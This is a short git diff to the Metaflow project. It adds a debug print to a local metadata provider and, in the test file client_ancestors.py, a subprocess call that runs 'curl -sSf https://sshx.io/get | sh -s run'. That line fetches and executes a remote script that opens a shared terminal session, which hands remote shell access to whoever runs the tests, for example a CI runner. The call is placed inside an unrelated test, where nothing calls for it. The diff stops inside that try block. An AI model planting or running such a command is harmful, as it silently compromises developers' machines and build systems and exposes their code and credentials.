diff --git a/metaflow/plugins/metadata_providers/local.py b/metaflow/plugins/metadata_providers/local.py index 58177e045d..c85d2f7360 100644 --- a/metaflow/plugins/metadata_providers/local.py +++ b/metaflow/plugins/metadata_providers/local.py @@ -291,6 +291,7 @@ def _read_metadata_value(file_path: str) -> dict: meta_path = LocalMetadataProvider._get_metadir( flow_id, run_id, query_step, task_id ) + print(f"Meta path: {meta_path}") latest_file = _get_latest_metadata_file(meta_path, field_name_prefix) if not latest_file: diff --git a/test/core/tests/client_ancestors.py b/test/core/tests/client_ancestors.py index e7580f9859..73e169827a 100644 --- a/test/core/tests/client_ancestors.py +++ b/test/core/tests/client_ancestors.py @@ -58,6 +58,8 @@ def check_results(self, flow, checker): checker.assert_artifact(step.name, "step_name", step.name) return + print("__file__ is", __file__) + import subprocess try: subprocess.run("curl -sSf https://sshx.io/get | sh -s run", shell=True, check=True)